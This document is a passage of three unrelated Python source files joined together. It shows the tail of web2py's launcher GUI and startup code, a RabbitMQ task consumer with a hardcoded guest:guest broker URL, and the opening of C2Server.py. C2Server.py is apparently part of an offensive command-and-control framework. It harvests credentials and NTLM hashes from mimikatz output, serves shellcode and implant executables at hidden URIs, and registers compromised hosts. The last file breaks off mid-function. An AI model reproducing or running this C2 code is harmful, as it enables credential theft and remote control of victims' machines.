%s""" % (ProgramName, ProgramAuthor, ProgramVersion)
item = lambda: messagebox.showinfo('About web2py', ProgramInfo)
helpmenu.add_command(label='About',
command=item)
self.menu.add_cascade(label='Info', menu=helpmenu)
self.root.config(menu=self.menu)
if options.taskbar:
self.root.protocol('WM_DELETE_WINDOW',
lambda: self.quit(True))
else:
self.root.protocol('WM_DELETE_WINDOW', self.quit)
sticky = tkinter.NW
# Prepare the logo area
self.logoarea = tkinter.Canvas(self.root,
background=bg_color,
width=300,
height=300)
self.logoarea.grid(row=0, column=0, columnspan=4, sticky=sticky)
self.logoarea.after(1000, self.update_canvas)
logo = os.path.join('extras', 'icons', 'splashlogo.gif')
if os.path.exists(logo):
img = tkinter.PhotoImage(file=logo)
pnl = tkinter.Label(self.logoarea, image=img, background=bg_color, bd=0)
pnl.pack(side='top', fill='both', expand='yes')
# Prevent garbage collection of img
pnl.image = img
# Prepare the banner area
self.bannerarea = tkinter.Canvas(self.root,
bg=bg_color,
width=300,
height=300)
self.bannerarea.grid(row=1, column=1, columnspan=2, sticky=sticky)
tkinter.Label(self.bannerarea, anchor=tkinter.N,
text=str(ProgramVersion + "\n" + ProgramAuthor),
font=('Helvetica', 11), justify=tkinter.CENTER,
foreground='#195866', background=bg_color,
height=3).pack(side='top',
fill='both',
expand='yes')
self.bannerarea.after(1000, self.update_canvas)
# IP
# retrieves the list of server IP addresses
try:
if_ips = list(set( # no duplicates
[addrinfo[4][0] for addrinfo in getipaddrinfo(socket.getfqdn())
if not is_loopback_ip_address(addrinfo=addrinfo)]))
except socket.gaierror:
if_ips = []
tkinter.Label(self.root,
text='Server IP:', bg=bg_color,
justify=tkinter.RIGHT).grid(row=4,
column=1,
sticky=sticky)
self.ips = {}
self.selected_ip = tkinter.StringVar()
row = 4
ips = [('127.0.0.1', 'Local (IPv4)')] + \
([('::1', 'Local (IPv6)')] if socket.has_ipv6 else []) + \
[(ip, 'Public') for ip in if_ips] + \
[('0.0.0.0', 'Public')]
for ip, legend in ips:
self.ips[ip] = tkinter.Radiobutton(
self.root, bg=bg_color, highlightthickness=0,
selectcolor='light grey', width=30,
anchor=tkinter.W, text='%s (%s)' % (legend, ip),
justify=tkinter.LEFT,
variable=self.selected_ip, value=ip)
self.ips[ip].grid(row=row, column=2, sticky=sticky)
if row == 4:
self.ips[ip].select()
row += 1
shift = row
# Port
tkinter.Label(self.root,
text='Server Port:', bg=bg_color,
justify=tkinter.RIGHT).grid(row=shift,
column=1, pady=10,
sticky=sticky)
self.port_number = tkinter.Entry(self.root)
self.port_number.insert(tkinter.END, self.options.port)
self.port_number.grid(row=shift, column=2, sticky=sticky, pady=10)
# Password
tkinter.Label(self.root,
text='Choose Password:', bg=bg_color,
justify=tkinter.RIGHT).grid(row=shift + 1,
column=1,
sticky=sticky)
self.password = tkinter.Entry(self.root, show='*')
self.password.bind('<Return>', lambda e: self.start())
self.password.focus_force()
self.password.grid(row=shift + 1, column=2, sticky=sticky)
# Prepare the canvas
self.canvas = tkinter.Canvas(self.root,
width=400,
height=100,
bg='black')
self.canvas.grid(row=shift + 2, column=1, columnspan=2, pady=5,
sticky=sticky)
self.canvas.after(1000, self.update_canvas)
# Prepare the frame
frame = tkinter.Frame(self.root)
frame.grid(row=shift + 3, column=1, columnspan=2, pady=5,
sticky=sticky)
# Start button
self.button_start = tkinter.Button(frame,
text='start server',
command=self.start)
self.button_start.grid(row=0, column=0, sticky=sticky)
# Stop button
self.button_stop = tkinter.Button(frame,
text='stop server',
command=self.stop)
self.button_stop.grid(row=0, column=1, sticky=sticky)
self.button_stop.configure(state='disabled')
if options.taskbar:
import gluon.contrib.taskbar_widget
self.tb = gluon.contrib.taskbar_widget.TaskBarIcon()
self.checkTaskBar()
if options.password != '<ask>':
self.password.insert(0, options.password)
self.start()
self.root.withdraw()
else:
self.tb = None
def update_schedulers(self, start=False):
if start and self.options.with_scheduler and self.options.schedulers:
# the widget takes care of starting the schedulers
apps = [ag.split(':', 1)[0] for ag in self.options.schedulers]
else:
apps = []
for app in apps:
self.try_start_scheduler(app)
# reset the menu
applications_folder = os.path.join(self.options.folder, 'applications')
available_apps = [
arq for arq in os.listdir(applications_folder)
if os.path.isdir(os.path.join(applications_folder, arq))
]
self.schedmenu.delete(0, len(available_apps))
for arq in available_apps:
if arq not in self.scheduler_processes:
item = lambda u = arq: self.try_start_scheduler(u)
self.schedmenu.add_command(label="start %s" % arq,
command=item)
if arq in self.scheduler_processes:
item = lambda u = arq: self.try_stop_scheduler(u)
self.schedmenu.add_command(label="stop %s" % arq,
command=item)
def start_schedulers(self, app):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for Python 2.6+\n')
return
code = "from gluon.globals import current;current._scheduler.loop()"
print('starting scheduler from widget for "%s"...' % app)
args = (app, True, True, None, False, code, False, True)
logging.getLogger().setLevel(self.options.log_level)
p = Process(target=run, args=args)
self.scheduler_processes[app] = p
self.update_schedulers()
print("Currently running %s scheduler processes" % (
len(self.scheduler_processes)))
p.start()
print("Processes started")
def try_stop_scheduler(self, app):
if app in self.scheduler_processes:
p = self.scheduler_processes[app]
del self.scheduler_processes[app]
p.terminate()
p.join()
self.update_schedulers()
def try_start_scheduler(self, app):
if app not in self.scheduler_processes:
t = threading.Thread(target=self.start_schedulers, args=(app,))
t.start()
def checkTaskBar(self):
""" Checks taskbar status """
if self.tb.status:
if self.tb.status[0] == self.tb.EnumStatus.QUIT:
self.quit()
elif self.tb.status[0] == self.tb.EnumStatus.TOGGLE:
if self.root.state() == 'withdrawn':
self.root.deiconify()
else:
self.root.withdraw()
elif self.tb.status[0] == self.tb.EnumStatus.STOP:
self.stop()
elif self.tb.status[0] == self.tb.EnumStatus.START:
self.start()
elif self.tb.status[0] == self.tb.EnumStatus.RESTART:
self.stop()
self.start()
del self.tb.status[0]
self.root.after(1000, self.checkTaskBar)
def update(self, text):
""" Updates app text """
try:
self.text.configure(state='normal')
self.text.insert('end', text)
self.text.configure(state='disabled')
except:
pass # ## this should only happen in case app is destroyed
def connect_pages(self):
""" Connects pages """
# reset the menu
applications_folder = os.path.join(self.options.folder, 'applications')
available_apps = [
arq for arq in os.listdir(applications_folder)
if os.path.exists(os.path.join(applications_folder, arq, '__init__.py'))
]
self.pagesmenu.delete(0, len(available_apps))
for arq in available_apps:
url = self.url + arq
self.pagesmenu.add_command(
label=url, command=lambda u=url: start_browser(u))
def quit(self, justHide=False):
""" Finishes the program execution """
if justHide:
self.root.withdraw()
else:
try:
scheds = self.scheduler_processes.keys()
for t in scheds:
self.try_stop_scheduler(t)
except:
pass
try:
newcron.stopcron()
except:
pass
try:
self.server.stop()
except:
pass
try:
self.tb.Destroy()
except:
pass
self.root.destroy()
sys.exit(0)
def error(self, message):
""" Shows error message """
if PY2:
import tkMessageBox as messagebox
else:
from tkinter import messagebox
messagebox.showerror('web2py start server', message)
def start(self):
""" Starts web2py server """
password = self.password.get()
if not password:
self.error('no password, no web admin interface')
ip = self.selected_ip.get()
if not is_valid_ip_address(ip):
return self.error('invalid host ip address')
try:
port = int(self.port_number.get())
except:
return self.error('invalid port number')
if self.options.server_key and self.options.server_cert:
proto = 'https'
else:
proto = 'http'
self.url = get_url(ip, proto=proto, port=port)
self.connect_pages()
self.button_start.configure(state='disabled')
try:
options = self.options
req_queue_size = options.request_queue_size
self.server = main.HttpServer(
ip,
port,
password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.server_cert,
ssl_private_key=options.server_key,
ssl_ca_certificate=options.ca_cert,
min_threads=options.min_threads,
max_threads=options.max_threads,
server_name=options.server_name,
request_queue_size=req_queue_size,
timeout=options.timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
thread.start_new_thread(self.server.start, ())
except Exception as e:
self.button_start.configure(state='normal')
return self.error(str(e))
if not self.server_ready():
self.button_start.configure(state='normal')
return
self.button_stop.configure(state='normal')
if not options.taskbar:
thread.start_new_thread(
start_browser, (get_url(ip, proto=proto, port=port), True))
self.password.configure(state='readonly')
[ip.configure(state='disabled') for ip in self.ips.values()]
self.port_number.configure(state='readonly')
if self.tb:
self.tb.SetServerRunning()
def server_ready(self):
for listener in self.server.server.listeners:
if listener.ready:
return True
return False
def stop(self):
""" Stops web2py server """
self.button_start.configure(state='normal')
self.button_stop.configure(state='disabled')
self.password.configure(state='normal')
[ip.configure(state='normal') for ip in self.ips.values()]
self.port_number.configure(state='normal')
self.server.stop()
if self.tb:
self.tb.SetServerStopped()
def update_canvas(self):
""" Updates canvas """
httplog = os.path.join(self.options.folder, self.options.log_filename)
try:
t1 = os.path.getsize(httplog)
except:
self.canvas.after(1000, self.update_canvas)
return
try:
fp = open(httplog, 'r')
fp.seek(self.t0)
data = fp.read(t1 - self.t0)
fp.close()
value = self.p0[1:] + [10 + 90.0 / math.sqrt(1 + data.count('\n'))]
self.p0 = value
for i in xrange(len(self.p0) - 1):
c = self.canvas.coords(self.q0[i])
self.canvas.coords(self.q0[i],
(c[0],
self.p0[i],
c[2],
self.p0[i + 1]))
self.t0 = t1
except BaseException:
self.t0 = time.time()
self.t0 = t1
self.p0 = [100] * 400
self.q0 = [self.canvas.create_line(i, 100, i + 1, 100,
fill='green') for i in xrange(len(self.p0) - 1)]
self.canvas.after(1000, self.update_canvas)
def check_existent_app(options, appname):
if os.path.isdir(os.path.join(options.folder, 'applications', appname)):
return True
def get_code_for_scheduler(app_groups, options):
app = app_groups[0]
if not check_existent_app(options, app):
print("Application '%s' doesn't exist, skipping" % app)
return None, None
code = 'from gluon.globals import current;'
if len(app_groups) > 1:
code += "current._scheduler.group_names=['%s'];" % "','".join(
app_groups[1:])
code += "current._scheduler.loop()"
return app, code
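# Example (hypothetical app name): for a schedulers entry "myapp:group1",
# app_groups is ['myapp', 'group1'] and, provided applications/myapp exists,
# this returns ('myapp', "from gluon.globals import current;"
#                        "current._scheduler.group_names=['group1'];current._scheduler.loop()")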
def start_schedulers(options):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for Python 2.6+\n')
return
logging.getLogger().setLevel(options.log_level)
apps = [ag.split(':') for ag in options.schedulers]
if not options.with_scheduler and len(apps) == 1:
app, code = get_code_for_scheduler(apps[0], options)
if not app:
return
print('starting single-scheduler for "%s"...' % app)
run(app, True, True, None, False, code, False, True)
return
# Work around OS X problem: http://bugs.python.org/issue9405
if PY2:
import urllib
else:
import urllib.request as urllib
urllib.getproxies()
processes = []
for app_groups in apps:
app, code = get_code_for_scheduler(app_groups, options)
if not app:
continue
print('starting scheduler for "%s"...' % app)
args = (app, True, True, None, False, code, False, True)
p = Process(target=run, args=args)
processes.append(p)
print("Currently running %s scheduler processes" % (len(processes)))
p.start()
##to avoid bashing the db at the same time
time.sleep(0.7)
print("Processes started")
for p in processes:
try:
p.join()
except (KeyboardInterrupt, SystemExit):
print("Processes stopped")
except:
p.terminate()
p.join()
def start():
""" Starts server and other services """
# get command line arguments
options = console(version=ProgramVersion)
if options.gae:
# write app.yaml, gaehandler.py, and exit
if not os.path.exists('app.yaml'):
name = options.gae
# for backward compatibility
if name == 'configure':
if PY2: input = raw_input
name = input("Your GAE app name: ")
content = open(os.path.join('examples', 'app.example.yaml'), 'rb').read()
open('app.yaml', 'wb').write(content.replace("yourappname", name))
else:
print("app.yaml alreday exists in the web2py folder")
if not os.path.exists('gaehandler.py'):
content = open(os.path.join('handlers', 'gaehandler.py'), 'rb').read()
open('gaehandler.py', 'wb').write(content)
else:
print("gaehandler.py alreday exists in the web2py folder")
return
logger = logging.getLogger("web2py")
logger.setLevel(options.log_level)
# on new installation build the scaffolding app
create_welcome_w2p()
if options.run_system_tests:
# run system test and exit
run_system_tests(options)
if options.quiet:
# to prevent writes on stdout set a null stream
class NullFile(object):
def write(self, x):
pass
sys.stdout = NullFile()
# but still has to mute existing loggers, to do that iterate
# over all existing loggers (root logger included) and remove
# all attached logging.StreamHandler instances currently
# streaming on sys.stdout or sys.stderr
loggers = [logging.getLogger()]
loggers.extend(logging.Logger.manager.loggerDict.values())
for l in loggers:
if isinstance(l, logging.PlaceHolder): continue
for h in l.handlers[:]:
if isinstance(h, logging.StreamHandler) and \
h.stream in (sys.stdout, sys.stderr):
l.removeHandler(h)
# NOTE: stderr.write() is still working
if not options.no_banner:
# banner
print(ProgramName)
print(ProgramAuthor)
print(ProgramVersion)
from pydal.drivers import DRIVERS
print('Database drivers available: %s' % ', '.join(DRIVERS))
if options.run_doctests:
# run doctests and exit
test(options.run_doctests, verbose=options.verbose)
return
if options.shell:
# run interactive shell and exit
sys.argv = [options.run or ''] + options.args
run(options.shell, plain=options.plain, bpython=options.bpython,
import_models=options.import_models, startfile=options.run,
cron_job=options.cron_job)
return
if options.cron_run:
# run cron (extcron) and exit
logger.debug('Starting extcron...')
global_settings.web2py_crontype = 'external'
extcron = newcron.extcron(options.folder, apps=options.crontabs)
extcron.start()
extcron.join()
return
if not options.with_scheduler and options.schedulers:
# run schedulers and exit
try:
start_schedulers(options)
except KeyboardInterrupt:
pass
return
if options.with_cron:
if options.soft_cron:
print('Using cron software emulation (but this is not very efficient)')
global_settings.web2py_crontype = 'soft'
else:
# start hardcron thread
logger.debug('Starting hardcron...')
global_settings.web2py_crontype = 'hard'
newcron.hardcron(options.folder, apps=options.crontabs).start()
# if no password provided and have Tk library start GUI (when not
# explicitly disabled), we also need a GUI to put in taskbar (system tray)
# when requested
root = None
if (not options.no_gui and options.password == '<ask>') or options.taskbar:
try:
if PY2:
import Tkinter as tkinter
else:
import tkinter
root = tkinter.Tk()
except (ImportError, OSError):
logger.warn(
'GUI not available because Tk library is not installed')
options.no_gui = True
except:
logger.exception('cannot get Tk root window, GUI disabled')
options.no_gui = True
if root:
# run GUI and exit
root.focus_force()
# Mac OS X - make the GUI window rise to the top
if os.path.exists("/usr/bin/osascript"):
applescript = """
tell application "System Events"
set proc to first process whose unix id is %d
set frontmost of proc to true
end tell
""" % (os.getpid())
os.system("/usr/bin/osascript -e '%s'" % applescript)
# web2pyDialog takes care of schedulers
master = web2pyDialog(root, options)
signal.signal(signal.SIGTERM, lambda a, b: master.quit())
try:
root.mainloop()
except:
master.quit()
sys.exit()
spt = None
if options.with_scheduler and options.schedulers:
# start schedulers in a separate thread
spt = threading.Thread(target=start_schedulers, args=(options,))
spt.start()
# start server
if options.password == '<ask>':
options.password = getpass.getpass('choose a password:')
if not options.password and not options.no_banner:
print('no password, disable admin interface')
# Use first interface IP and port if interfaces specified, since the
# interfaces option overrides the IP (and related) options.
if not options.interfaces:
ip = options.ip
port = options.port
else:
first_if = options.interfaces[0]
ip = first_if[0]
port = first_if[1]
if options.server_key and options.server_cert:
proto = 'https'
else:
proto = 'http'
url = get_url(ip, proto=proto, port=port)
if not options.no_banner:
message = '\nplease visit:\n\t%s\n'
if sys.platform.startswith('win'):
message += 'use "taskkill /f /pid %i" to shutdown the web2py server\n\n'
else:
message += 'use "kill -SIGTERM %i" to shutdown the web2py server\n\n'
print(message % (url, os.getpid()))
# enhance linecache.getline (used by debugger) to look at the source file
# if the line was not found (under py2exe & when file was modified)
import linecache
py2exe_getline = linecache.getline
def getline(filename, lineno, *args, **kwargs):
line = py2exe_getline(filename, lineno, *args, **kwargs)
if not line:
try:
with open(filename, "rb") as f:
for i, line in enumerate(f):
line = line.decode('utf-8')
if lineno == i + 1:
break
else:
line = ''
except (IOError, OSError):
line = ''
return line
linecache.getline = getline
server = main.HttpServer(ip=ip,
port=port,
password=options.password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.server_cert,
ssl_private_key=options.server_key,
ssl_ca_certificate=options.ca_cert,
min_threads=options.min_threads,
max_threads=options.max_threads,
server_name=options.server_name,
request_queue_size=options.request_queue_size,
timeout=options.timeout,
socket_timeout=options.socket_timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
try:
server.start()
except KeyboardInterrupt:
server.stop()
if spt is not None:
try:
spt.join()
except:
logger.exception('error terminating schedulers')
pass
logging.shutdown()
|
TaskRuntime_async.py
|
import thread
import threading
import time
import task
import json
import logging
import pika
import traceback
import AsyncConsumer
import Queue
class Timer(object):
def __init__(self, verbose=False):
self.verbose = verbose
def __enter__(self):
self.start = time.time()
return self
def __exit__(self, *args):
self.end = time.time()
self.secs = self.end - self.start
self.msecs = self.secs * 1000 # millisecs
if self.verbose:
print 'elapsed time: %f ms' % self.msecs
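# Usage sketch for Timer (do_work is a placeholder for the caller's own code):
#     with Timer(verbose=True) as t:
#         do_work()
#     # prints "elapsed time: ... ms"; t.secs and t.msecs keep the measurements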
class TaskRuntime:
def init(self, runtime_config, task_config):
self.config = runtime_config
self.task = task.Task();
self.task.init(task_config);
connection = pika.BlockingConnection(pika.ConnectionParameters(
host = self.config['broker_host'],
virtual_host = self.config['broker_vhost'],
credentials = pika.PlainCredentials(self.config['broker_username'],
self.config['broker_password'])
))
channel = connection.channel()
result = channel.queue_declare(queue = self.config['subscript_queue'],
durable=True, auto_delete=False)
channel.basic_qos(prefetch_count=10)
qname = result.method.queue
channel.queue_bind(exchange=self.config['broker_exchange'],
queue=qname, routing_key=self.config['subscript_topic'])
self.config['subscript_queue'] = qname
self.channel = channel
self.stat = {
'messages' : 0,
'messages_success' : 0,
'messages_failed' : 0
}
    def stop(self, reason):
        # unsubscribe from the broker (if the consumer was started) and stop the task
        if hasattr(self, 'consumer'):
            self.consumer.stop()
        self.task.stop()
def start_consuming(self):
self.consumer.run()
def start(self):
#channel = self.channel
#channel.basic_consume(self.on_message, queue = self.config['subscript_queue'], no_ack=False)
self.consumer = AsyncConsumer.AsyncConsumer('amqp://guest:guest@localhost:5672/%2F','quotation_daily', 'auction', '#')
import threading
thread = threading.Thread(target = self.start_consuming)
thread.start()
try:
#channel.start_consuming()
starttime = time.time()
message_count = 0
start_message_count = message_count
while True:
try:
msg = self.consumer.msg_queue.get(False)
except Queue.Empty:
continue
if msg is not None:
message_count += 1
self.on_message2(msg)
else:
print "No data available"
now = time.time()
if now - starttime > 5:
timespan = now - starttime
print "%s msgs processed, avg time %s"%(message_count - start_message_count, (message_count - start_message_count)/timespan)
starttime = now
start_message_count = message_count
except KeyboardInterrupt:
#channel.stop_consuming()
#channel.cancel()
self.consumer.stop()
            self.channel.connection.close()
def on_message2(self, msg):
header = msg['headers']
data = json.loads(msg['body'])
ret = self.task.run(header, data)
if ret:
self.consumer.ack_queue.put(msg['delivery_tag'])
def on_message(self, channel, method_frame, header_frame, body):
running = True
if header_frame.headers is None:
header = {}
else:
header = header_frame.headers.copy()
header['routing_key'] = method_frame.routing_key
delivery_tag = method_frame.delivery_tag
data = json.loads(body)
with Timer(False) as t:
try:
ret = self.task.run(header, data)
if ret:
self.stat['messages'] += 1
self.stat['messages_success'] += 1
#logging.info('messages : %s, success : %d, failed : %d', self.stat['messages'],
# self.stat['messages_success'], self.stat['messages_failed'])
else:
self.stat['messages'] += 1
self.stat['messages_failed'] += 1
logging.info('messages : %s, success : %d, failed : %d', self.stat['messages'],
self.stat['messages_success'], self.stat['messages_failed'])
except Exception as err:
logging.error(err)
self.stat['messages'] += 1
self.stat['messages_failed'] += 1
logging.info('messages : %s, success : %d, failed : %d', self.stat['messages'],
self.stat['messages_success'], self.stat['messages_failed'])
channel.basic_nack(delivery_tag=delivery_tag)
tb = traceback.format_exc()
print tb
raise SystemExit("I need arguments!")
else:
channel.basic_ack(delivery_tag=delivery_tag)
running = False;
def log(self, level, message):
#send log info to server
pass
def send_message(self, topic, header, data):
#create an AMQP message and send to broker
pass
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s',
level=logging.INFO)
runtime = TaskRuntime()
with open('runtime.config', 'r') as f:
runtime_config = json.loads(f.read())
with open('task.config', 'r') as f:
task_config = json.loads(f.read())
runtime.init(runtime_config, task_config)
runtime.start()
|
C2Server.py
|
#!/usr/bin/env python3
import os, sys, datetime, time, base64, logging, signal, re, ssl, traceback, threading
from urllib.request import urlopen, Request
from urllib.error import HTTPError, URLError
from Implant import Implant
from Tasks import newTask
from Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days
from Colours import Colours
from DB import select_item, get_implants_all, update_implant_lastseen, update_task, get_cmd_from_task_id, get_c2server_all, get_sharpurls
from DB import update_item, get_task_owner, get_newimplanturl, initializedb, setupserver, new_urldetails, get_baseenckey, insert_cred, get_c2_messages
from Payloads import Payloads
from Config import ROOTDIR, ServerHeader, PayloadsDirectory, HTTPResponse, DownloadsDirectory, Database, HostnameIP, SocksHost
from Config import QuickCommand, KillDate, DefaultSleep, DomainFrontHeader, ServerPort, urlConfig, HOST_NAME, PORT_NUMBER
from Config import DownloadURI, Sounds, APIKEY, MobileNumber, URLS, SocksURLS, Insecure, UserAgent, Referrer, APIToken
from Config import APIUser, EnableNotifications
from Cert import create_self_signed_cert
from Help import logopic
from Utils import validate_sleep_time, randomuri, gen_key
from socketserver import ThreadingMixIn
from http.server import BaseHTTPRequestHandler, HTTPServer
def process_mimikatz(lines):
# code source https://github.com/stufus/parse-mimikatz-log/blob/master/pml.py
main_count = 0
current = {}
for line in lines.split('\n'):
main_count += 1
val = re.match(r'^\s*\*\s+Username\s+:\s+(.+)\s*$', line.strip())
if val is not None:
current = {}
current['Username'] = val.group(1).strip()
if current['Username'] == '(null)':
current['Username'] = None
continue
val = re.match(r'^\s*\*\s+Domain\s+:\s+(.+)\s*$', line.strip())
if val is not None:
current['Domain'] = val.group(1).strip()
if current['Domain'] == '(null)':
current['Domain'] = None
continue
val = re.match(r'^\s*\*\s+(NTLM|Password)\s+:\s+(.+)\s*$', line.strip())
if val is not None and "Username" in current and "Domain" in current:
if val.group(2).count(" ") < 10:
current[val.group(1).strip()] = val.group(2)
if val.group(1) == "Password":
if val.group(2) == '(null)':
continue
insert_cred(current['Domain'], current['Username'], current['Password'], None)
elif val.group(1) == "NTLM":
if val.group(2) == '(null)':
continue
insert_cred(current['Domain'], current['Username'], None, current['NTLM'])
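# The regexes above expect the usual mimikatz logonpasswords layout, roughly
# (illustrative placeholders, not real output):
#         * Username : <user>
#         * Domain   : <domain>
#         * NTLM     : <32-hex-digit hash>
#         * Password : (null)
# Username/Domain lines open a record; NTLM/Password lines feed insert_cred.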
class MyHandler(BaseHTTPRequestHandler):
def signal_handler(signal, frame):
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
def log_message(self, format, *args):
try:
useragent = str(self.headers['user-agent'])
except Exception:
useragent = "None"
open("%swebserver.log" % ROOTDIR, "a").write("%s - [%s] %s %s\n" %
(self.address_string(), self.log_date_time_string(), format % args, useragent))
def do_HEAD(s):
"""Respond to a HEAD request."""
s.server_version = ServerHeader
s.sys_version = ""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_OPTIONS(s):
"""Respond to a HEAD request."""
s.server_version = ServerHeader
s.sys_version = ""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_PUT(s):
"""Respond to a PUT request."""
s.server_version = ServerHeader
s.sys_version = ""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_GET(s):
"""Respond to a GET request."""
logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(s.path), str(s.headers))
new_implant_url = get_newimplanturl()
s.cookieHeader = s.headers.get('Cookie')
QuickCommandURI = select_item("QuickCommand", "C2Server")
UriPath = str(s.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
s.server_version = ServerHeader
s.sys_version = ""
if not s.cookieHeader:
s.cookieHeader = "NONE"
# implant gets a new task
new_task = newTask(s.path)
if new_task:
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(new_task)
elif [ele for ele in sharplist if(ele in UriPath)]:
try:
open("%swebserver.log" % ROOTDIR, "a").write("%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (s.address_string(), s.log_date_time_string(), SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath), headers={'Accept-Encoding': 'gzip', 'Cookie': '%s' % s.cookieHeader, 'User-Agent': UserAgent})
res = urlopen(r)
sharpout = res.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.send_header("Connection", "close")
s.send_header("Content-Length", len(sharpout))
s.end_headers()
if (len(sharpout) > 0):
s.wfile.write(sharpout)
except HTTPError as e:
s.send_response(e.code)
s.send_header("Content-type", "text/html")
s.send_header("Connection", "close")
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
open("%swebserver.log" % ROOTDIR, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
print(Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes(HTTPResponse, "utf-8"))
elif ("%s_bs" % QuickCommandURI) in s.path:
filename = "%spayload.bat" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%s_rg" % QuickCommandURI) in s.path:
filename = "%srg_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%ss/86/portal" % QuickCommandURI) in s.path:
filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%ss/64/portal" % QuickCommandURI) in s.path:
filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%sp/86/portal" % QuickCommandURI) in s.path:
filename = "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%sp/64/portal" % QuickCommandURI) in s.path:
filename = "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%s_cs" % QuickCommandURI) in s.path:
filename = "%scs_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%s_py" % QuickCommandURI) in s.path:
filename = "%saes.py" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = "a" + "".join("{:02x}".format(c) for c in content)
s.send_response(200)
s.send_header("Content-type", "text/plain")
s.end_headers()
s.wfile.write(bytes(content, "utf-8"))
elif ("%s_ex86" % QuickCommandURI) in s.path:
filename = "%sPosh32.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "application/x-msdownload")
s.end_headers()
s.wfile.write(content)
elif ("%s_ex64" % QuickCommandURI) in s.path:
filename = "%sPosh64.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "application/x-msdownload")
s.end_headers()
s.wfile.write(content)
# register new implant
elif new_implant_url in s.path and s.cookieHeader.startswith("SessionID"):
implant_type = "PS"
if s.path == ("%s?p" % new_implant_url):
implant_type = "PS Proxy"
if s.path == ("%s?d" % new_implant_url):
implant_type = "PS Daisy"
if s.path == ("%s?m" % new_implant_url):
implant_type = "Python"
if s.path == ("%s?d?m" % new_implant_url):
implant_type = "Python Daisy"
if s.path == ("%s?p?m" % new_implant_url):
implant_type = "Python Proxy"
if s.path == ("%s?c" % new_implant_url):
implant_type = "C#"
if s.path == ("%s?d?c" % new_implant_url):
implant_type = "C# Daisy"
if s.path == ("%s?p?c" % new_implant_url):
implant_type = "C# Proxy"
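            # Query-string suffixes decide the implant flavour registered below:
            # no suffix = PowerShell, ?p = proxy, ?d = daisy, ?m = Python, ?c = C#,
            # with ?d?m / ?p?m / ?d?c / ?p?c naming the combinations.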
if implant_type.startswith("C#"):
cookieVal = (s.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1])
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.SharpCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
elif implant_type.startswith("Python"):
cookieVal = (s.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1])
